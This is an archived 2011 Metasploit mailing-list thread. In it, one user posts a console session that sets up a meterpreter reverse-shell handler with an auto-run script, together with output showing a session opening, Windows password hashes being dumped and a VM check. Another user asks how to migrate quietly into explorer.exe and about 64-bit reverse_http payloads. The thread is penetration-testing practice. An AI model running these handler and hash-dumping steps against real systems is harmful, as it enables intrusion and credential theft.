Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: News from Metasploit 4.

From: Richard Miles <richard.k.miles () googlemail com>
Date: Sat, 27 Aug 2011 14:47:32 -0500
Hi Carlos,

It really works very well, big thanks.

I noted that migrate on metasploit4 do not work without the pid. I
tried pass the name explorer.exe but it doesn't work. Do you know some
workaround?

I found this idea
http://blog.invisibledenizen.org/2008/12/automatic-migration-to-new-process-with.html

But it execute a new cmd, I don't want to create a new process, I
would like to just move to the existent explorer.exe, do you know any
script or trick for this?

Also, when you call screenshot your Linux automatic display lynx too?
Any way to avoid it?

Thanks and keep the good work.

On Sat, Aug 27, 2011 at 2:15 PM, Richard Miles
<richard.k.miles () googlemail com> wrote:

Hi Carlos

I followed your step by step and it worked, I'm really a foul. Thanks a lot.

By the way do you know if there is reverse_http(s) for windows 64 bits?

Thanks, really thanks.

On Sat, Aug 27, 2011 at 1:50 PM, Carlos Perez
<dark0perator () pauldotcom com> wrote:

works for me
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf  exploit(handler) > set AutoRunScript multi_console_command -rc /tmp/sample.rc
AutoRunScript => multi_console_command -rc /tmp/sample.rc
msf  exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf  exploit(handler) > exploit -x -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler...
msf  exploit(handler) > cat /tmp/sample.rc
[*] exec: cat /tmp/sample.rc

sysinfo
getuid
load priv
hashdump
run checkvm
msf  exploit(handler) >
[*] Sending stage (752128 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.115:1543) at 2011-08-27 14:49:29 -0400
[*] Session ID 1 (192.168.1.100:4444 -> 192.168.1.115:1543) processing AutoRunScript 'multi_console_command -rc 
/tmp/sample.rc'
[*] Running Command List ...
[*]     Running command sysinfo
Computer        : CARLOS-192FCD91
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
[*]     Running command getuid
Server username: CARLOS-192FCD91\Administrator
[*]     Running command load priv
[-] The 'priv' extension has already been loaded.
[*]     Running command hashdump
Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392:::
HR:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e:::
[*]     Running command run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a VMware Virtual Machine

On Aug 26, 2011, at 4:16 PM, Richard Miles wrote:


Hi HD Moore,

Thanks for links. Does the new reverse_http works in 64 bit Windows?
How should I call it?

Any follow-up on the other 2 questions on the e-mail?

Thanks

On Fri, Aug 26, 2011 at 9:19 AM, HD Moore <hdm () metasploit com> wrote:

The Metasploit blog includes quite a bit of information on 4.0:
 https://community.rapid7.com/community/metasploit?view=blog

You can also see the release notes:
 https://community.rapid7.com/docs/DOC-1496
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework






_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: